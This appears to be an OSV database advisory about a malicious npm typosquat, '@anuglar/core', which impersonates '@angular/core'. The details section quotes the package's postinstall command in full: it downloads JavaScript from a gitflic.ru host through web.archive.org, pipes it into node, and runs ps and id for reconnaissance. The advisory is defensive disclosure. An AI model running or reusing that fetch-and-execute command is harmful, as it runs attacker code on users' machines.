MAL-2026-17541

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anuglar/core/MAL-2026-17541.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17541
Published
2026-10-05T03:32:22Z
Modified
2026-10-05T04:15:05Z
Summary
Malicious code in @anuglar/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98)

Package name '@anuglar/core' is a one-character transposition of '@angular/core' and copies the legitimate package's description ('Angular - the core framework'), author ('angular'), and repository URL to impersonate it. The package.json postinstall lifecycle script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, downloading arbitrary JavaScript from a third-party host (gitflic.ru, fetched via web.archive.org) and piping it directly into node for execution on npm install. The fetched code is unpinned, unhashed, and not shipped in the tarball, so its contents can change at any time and are executed with the privileges of the installing user. The script also references ps and id for host reconnaissance.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020994",
            "import_time": "2026-10-05T03:57:37.34447008Z",
            "modified_time": "2026-10-05T03:32:22Z",
            "sha256": "5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98",
            "source": "amazon-inspector",
            "versions": [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @anuglar/core

Package

Name
@anuglar/core
View open source insights on deps.dev
Purl
pkg:npm/%40anuglar/core

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "2de6dee8c71002d54518aa49e62bffa1081200c0c7ff1a03a0ce791cbfe8f716",
            "tlsh": "6d513624e4f48d6323de6294dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"
        }
    ],
    "package_integrity": [
        {
            "filename": "core-22.2.1.tgz",
            "hashes": {
                "sha1": "cb12f38a3d35bf7d9400843db114fcbe81172751",
                "sha512_sri": "sha512-n+T2S96kVw6a928DUvq+XujARUa/kcoUHJV8TxnSgdzkCB0TrBok/Vh3Xz4TzFX7oCT3gvdLV3pDyP2klZVFTQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anuglar/core/MAL-2026-17541.json"